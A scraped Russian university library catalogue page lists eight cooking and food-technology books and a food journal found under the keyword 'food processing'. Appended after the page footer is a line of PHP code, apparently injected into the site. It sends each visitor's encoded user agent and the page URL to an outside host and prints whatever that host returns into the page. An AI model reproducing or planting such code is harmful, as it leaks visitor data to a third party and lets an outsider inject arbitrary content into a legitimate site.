Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

138 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ОБРАБОТКА ПРОДУКТОВ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 8
1. 
Производственное обучение профессии "Повар" : учебное пособие для начального профессионального образования : в 4-х ч. / В. П. Андросов [и др.]. Ч. 1 : Механическая кулинарная обработка продуктов, 2007. - 96 с.
Держатели документа (Информация об экземплярах) 
2. 
Сопина Л. Н. Пособие для повара [Текст] / Л. Н. Сопина, 2000. - 240 с.
Ключевые слова 
ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ПИТАНИЕ ОБЩЕСТВЕННОЕ -- ОБРАБОТКА ПРОДУКТОВ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА КАРТОФЕЛЯ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- ОБРАБОТКА ПРОДУКТОВ ТЕПЛОВАЯ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА ГОРЯЧИЕ -- ЗАКУСКА -- БУТЕРБРОД -- ВИНЕГРЕТ -- СУП -- БУЛЬОН -- СУП ОВОЩНОЙ -- СУП КАРТОФЕЛЬНЫЙ -- СУП МОЛОЧНЫЙ -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- БЛЮДА МЯСНЫЕ -- БЛЮДА РЫБНЫЕ -- БЛЮДА ИЗ ОВОЩЕЙ -- СОУС -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА СЛАДКИЕ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- БРАКЕРАЖ
Держатели документа (Информация об экземплярах) 
3. 
Питание и общество. - Журнал, 2008г. № 9
Оглавление 
  • Полуэктова, И. Пищевые добавки / И. Полуэктова, В. Быстрицкая. - с.12-13
    Кл. слова: ДОБАВКА ПИЩЕВАЯ
  • Дейниченко, Г. Аппарат для очистки корнеклубнеплодов / Г. Дейниченко, О. Терешкин, Д. Дмитриевский. - с.14-15
    Кл. слова: АППАРАТ ОЧИСТКИ КОРНЕКЛУБНЕПЛОДОВ
  • Сизых, В. Обработка продуктов / В. Сизых. - с.20-21
    Кл. слова: ОБРАБОТКА ПРОДУКТОВ
  • Филонов, М. Победный лук / М. Филонов. - с.22
    Кл. слова: ЛУК
  • Яблоко. - с.23
    Кл. слова: ЯБЛОКО
  • Сколько стоит диета?. - с.26
    Кл. слова: ДИЕТА
  • Из глубины веков. - с.28-29
    Кл. слова: БЛЮДА ИЗ РЫБЫ, БЛЮДА ИЗ МОРЕПРОДУКТОВ
4. 
Васюкова А. Т. Организация производства и управление качеством продукции в общественном питании [Текст] : учеб. пособие / А. Т. Васюкова, В. И. Пивоваров, К. В. Пивоваров, 2009. - 328 с.
Держатели документа (Информация об экземплярах) 
5. 
Хлебников В. И. Технология товаров (продовольственных) [Текст] : учеб. для студентов вузов / В. И. Хлебников, 2005. - 426 с.
Держатели документа (Информация об экземплярах) 
6. 
Барановский В. А. Рецептурный справочник повара [Текст] : справочное издание / В. А. Барановский, 2003. - 379 с.
Ключевые слова 
ОБРАБОТКА ПРОДУКТОВ -- БЕЛКИ -- ЖИРЫ -- УГЛЕВОДЫ -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА НЕРЫБНОГО ВОДНОГО -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА ИЗ ГРИБОВ -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- БЛЮДА ИЗ дичи -- БЛЮДА ИЗ кролика -- СОУС -- БЛЮДА СЛАДКИЕ -- ТЕСТО -- ФАРШ
Держатели документа (Информация об экземплярах) 
7. 
Технология приготовления пищи [Текст] : Учеб. пособие для студ. спец. "Технология продуктов общественного питания" / Омский ин-т предпринимательства и права, 2004. - 206 с.
Держатели документа (Информация об экземплярах) 
8. 
Барановский В. А. Повар-технолог [Текст] : Учеб. пособие для студ. сред. спец. заведений / В. А. Барановский, 2003. - 415 с.
Ключевые слова 
ФИЗИОЛОГИЯ ПИТАНИЯ -- САНИТАРИЯ -- ГИГИЕНА ОБЩЕСТВЕННОГО ПИТАНИ -- ПИТАНИЕ -- ГИГИЕНА ЛИЧНАЯ повара -- ОБРАБОТКА продуктов -- ОБРАБОТКА ОВОЩЕЙ -- ОБРАБОТКА ГРИБОВ -- ОБРАБОТКА РЫБЫ -- ОБРАБОТКА МЯСА -- ОБРАБОТКА ПТИЦЫ -- ОБРАБОТКА ДИЧИ -- ОБРАБОТКА КРОЛИКОВ -- БЛЮДА ХОЛОДНЫЕ -- БЛЮДА горячие -- ЗАКУСКА -- БЛЮДА ИЗ ОВОЩЕЙ -- БЛЮДА РЫБНЫЕ -- БЛЮДА МЯСНЫЕ -- БЛЮДА ИЗ ПТИЦЫ -- СУП -- СОУС -- ПРЯНОСТИ -- БЛЮДА ИЗ ЯИЦ -- БЛЮДА ИЗ ТВОРОГА -- БЛЮДА ИЗ КРУП -- БЛЮДА ИЗ БОБОВЫХ -- БЛЮДА СЛАДКИЕ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- НАПИТКИ -- ТЕСТО -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО БЕЗДРОЖЖЕВОЕ -- ТЕСТО слоеное -- ТЕСТО песочное -- ТЕСТО бисквитное -- ТЕСТО заварное
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3023 - 19.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.82 с.14 запросов, 0.60c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;